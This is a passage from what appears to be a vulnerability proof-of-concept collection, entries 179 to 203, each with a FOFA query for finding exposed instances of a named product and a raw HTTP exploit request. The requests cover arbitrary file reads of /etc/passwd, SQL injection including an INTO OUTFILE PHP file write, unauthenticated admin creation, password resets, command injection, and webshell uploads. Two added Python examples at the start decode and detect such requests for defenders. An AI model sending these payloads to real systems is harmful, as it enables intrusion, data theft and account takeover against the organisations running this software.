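Entries 177 and 178 (and, earlier on this page, 160, 169, 170 and 191) all reach their target through '..' segments, sometimes percent-encoded. A rule or log search that matches the literal request path misses them, because the server resolves /userLogin.asp/../actionpolicy_status/../ER8300G2.cfg to /ER8300G2.cfg before serving it. The Python below is an added example for this page (not code from the write-up or from H3C) that decodes and normalises a path the way a server does and reports the three signals a detection rule would combine: a '..' segment was present, the path tried to climb above the root, and the resolved target is a sensitive file. The sample paths are copied from the entries named; the list of sensitive targets and the benign control are this example's own.

```python
"""Normalise request paths built from '..' segments, like the H3C .cfg paths in
entry 177 and the %2e%2e path of entry 178 (the same trick appears in entries
160, 169, 170 and 191).

Added example for this page; not code from the write-up or from H3C. The point
for a defender is that matching on the literal request path misses these: the
server resolves '/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg' to
'/ER8300G2.cfg', so detection has to look at the decoded, normalised path as
well as the raw one. SAMPLE_PATHS are copied from the entries named above plus
one benign control; SENSITIVE_TARGETS is this example's own list.
"""
from urllib.parse import unquote

SENSITIVE_TARGETS = (".cfg", ".config", ".ini", ".xml", "/etc/passwd", "/etc/shadow")

SAMPLE_PATHS = [
    "/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg",                 # 177
    "/imc/primepush/%2e%2e/flexFileUpload",                                   # 178
    "/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",   # 160
    "/templates/attestation/../../selfservice/lawbase/downlawbase",           # 169
    "/CDGServer3/js/../NavigationAjax",                                       # 191
    "/userLogin.asp",                                                         # benign control
]


def fully_decode(path: str, rounds: int = 3) -> str:
    """Percent-decode until nothing changes, so %252e%252e is caught as well as %2e%2e."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def normalise(path: str):
    """Resolve '.' and '..' as a web server does; return (clean_path, root_escapes).

    root_escapes counts '..' segments that tried to climb above '/', the
    signature of a traversal aimed outside the web root."""
    stack, escapes = [], 0
    for seg in fully_decode(path).split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escapes += 1
            continue
        stack.append(seg)
    return "/" + "/".join(stack), escapes


def assess_path(path: str) -> dict:
    """Collect the three signals a detection rule would combine."""
    clean, escapes = normalise(path)
    return {
        "raw": path,
        "normalised": clean,
        "has_dotdot": ".." in fully_decode(path).split("/"),
        "escapes_root": escapes > 0,
        "sensitive_target": clean.lower().endswith(SENSITIVE_TARGETS),
    }


def suspicious(path: str) -> bool:
    a = assess_path(path)
    return a["has_dotdot"] or a["escapes_root"] or a["sensitive_target"]


if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        a = assess_path(p)
        print(f"{'SUSPECT' if suspicious(p) else 'ok     '} {a['normalised']:<40} <- {p}")
```

Note that the H3C and 宏景 paths never leave the web root (root_escapes stays 0); they only use '..' to dodge a prefix-based access check on /userLogin.asp or /templates/. The has_dotdot signal catches that case, while root_escapes catches the Nexus style that climbs to /etc/passwd.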
179. 建文工程管理系统 arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA: server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 SQL injection
Affected: version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

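This payload does more than a time-based probe: it is a stacked query that uses SELECT ... INTO OUTFILE to write a file under WebRoot, with the file body hidden in a hex literal and the path written with backslash escapes. The Python below is an added example for this page (not code from the write-up or from the vendor) that URL-decodes the query, extracts the hex literal and the OUTFILE target, and renders both, so an analyst reviewing such a request can see what was written and where without decoding by hand. SAMPLE_TARGET is the request target from the entry above; the regular expressions and the parameter name default are this example's own.

```python
"""Decode the 瑞友天翼 appsave injection above to show what it writes and where.

Added example for this page, not code from the write-up or from the vendor.
The appid value is a stacked query: it closes the original statement, then
runs SELECT unhex('...') INTO OUTFILE '...'. The hex literal hides the file
body and the backslash-escaped path places it under WebRoot. The helpers
URL-decode the query, pull out the hex literal and the OUTFILE target, and
render both so an analyst need not decode by hand. SAMPLE_TARGET is the
request target from the entry above; the regular expressions are this
example's own.
"""
import re
from urllib.parse import parse_qs, urlsplit

SAMPLE_TARGET = (
    "/index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%27"
    "3c3f706870206563686f206d6435"
    "28223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b"
    "%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23"
)

UNHEX_RE = re.compile(r"unhex\s*\(\s*'([0-9a-fA-F]+)'\s*\)", re.IGNORECASE)
OUTFILE_RE = re.compile(r"into\s+(?:out|dump)file\s+'((?:[^'\\]|\\.)*)'", re.IGNORECASE)


def decoded_params(target: str) -> dict:
    """URL-decode the query string ('+' -> space, %27 -> quote, ...), first value per key."""
    query = urlsplit(target).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def unescape_sql_string(literal: str) -> str:
    """Undo MySQL backslash escapes inside a string literal (\\\\ -> \\, \\' -> ')."""
    return re.sub(r"\\(.)", r"\1", literal)


def analyse_injection(target: str, param: str = "appid") -> dict:
    """Return the decoded SQL fragment, the content the hex hides and the write target."""
    sql = decoded_params(target).get(param, "")
    hexes = UNHEX_RE.findall(sql)
    written = b"".join(bytes.fromhex(h) for h in hexes).decode("utf-8", "replace")
    match = OUTFILE_RE.search(sql)
    return {
        "sql": sql,
        "stacked_query": ";" in sql,
        "written_content": written,
        "outfile_path": unescape_sql_string(match.group(1)) if match else None,
    }


if __name__ == "__main__":
    for key, value in analyse_injection(SAMPLE_TARGET).items():
        print(f"{key:16} {value!r}")
```

For the request above the decoded hex is a short PHP file that prints md5("1") and then deletes itself, and the OUTFILE target resolves to .\..\..\WebRoot\plom.xgi relative to the MySQL data directory. On a host where this succeeded, that file (or its .xgi handler mapping) is the artifact to look for; INTO OUTFILE also requires the FILE privilege and a secure_file_priv setting that permits the path, which is the configuration to check.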
186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation installations.
FOFA: title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection (time-based variant)
CVE-2024-32640
FOFA: "Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment arbitrary file read
Affected: version <= 3.9.7
FOFA: body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA: app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA: title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 Electronic Document Security Management System NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 Yunjian Security Management System setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.
POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 Internet Access Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan 风速科技 Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit assetsmanager_upload endpoint file upload
1. Run the PoC to obtain the CSRF token, then obtain a cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload the file and access the result:
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 Omni-media News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--